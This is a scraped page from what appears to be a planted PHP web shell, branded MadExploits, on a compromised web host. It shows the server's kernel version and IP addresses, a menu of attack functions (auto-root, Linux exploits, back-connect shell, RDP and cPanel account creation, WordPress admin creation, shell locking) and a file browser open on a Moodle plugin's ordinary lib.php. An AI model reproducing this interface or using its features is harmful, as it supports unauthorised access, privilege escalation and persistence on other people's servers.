Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.69.17.196
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
blocks /
xp /
[ HOME SHELL ]
Name
Size
Permission
Action
.vscode
[ DIR ]
drwxr-xr-x
amd
[ DIR ]
drwxr-xr-x
backup
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
pix
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
ui
[ DIR ]
drwxr-xr-x
yui
[ DIR ]
drwxr-xr-x
.eslintrc
322
B
-rw-r--r--
.gitattributes
44
B
-rw-r--r--
.gitignore
39
B
-rw-r--r--
.travis.yml
3.29
KB
-rw-r--r--
CHANGELOG.md
11.21
KB
-rw-r--r--
README.md
3.24
KB
-rw-r--r--
ajax.php
1.2
KB
-rw-r--r--
block_xp.php
1.71
KB
-rw-r--r--
composer.json
502
B
-rw-r--r--
edit_form.php
1.67
KB
-rw-r--r--
gulpfile.js
2.83
KB
-rw-r--r--
index.php
1.45
KB
-rw-r--r--
lib.php
1.59
KB
-rw-r--r--
package.json
1.07
KB
-rw-r--r--
postcss.config.js
186
B
-rw-r--r--
renderer.php
38.94
KB
-rw-r--r--
settings.php
1.16
KB
-rw-r--r--
styles.css
21.07
KB
-rw-r--r--
tailwind.config.js
1.85
KB
-rw-r--r--
tsconfig.json
1017
B
-rw-r--r--
version.php
1.06
KB
-rw-r--r--
webpack.common.js
855
B
-rw-r--r--
webpack.dev.js
152
B
-rw-r--r--
webpack.prod.js
201
B
-rw-r--r--
yarn.lock
178.5
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lib.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Block XP lib. * * @package block_xp * @copyright 2014 Frédéric Massart - FMCorz.net * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ defined('MOODLE_INTERNAL') || die(); /** * File serving. * * @param stdClass $course The course object. * @param stdClass $bi Block instance record. * @param context $context The context object. * @param string $filearea The file area. * @param array $args List of arguments. * @param bool $forcedownload Whether or not to force the download of the file. * @param array $options Array of options. * @return void|false */ function block_xp_pluginfile($course, $bi, $context, $filearea, $args, $forcedownload, array $options = array()) { $fs = \block_xp\di::get('file_server'); if ($fs instanceof \block_xp\local\file\block_file_server) { $fs->serve_block_file($course, $bi, $context, $filearea, $args, $forcedownload, $options); } }
Close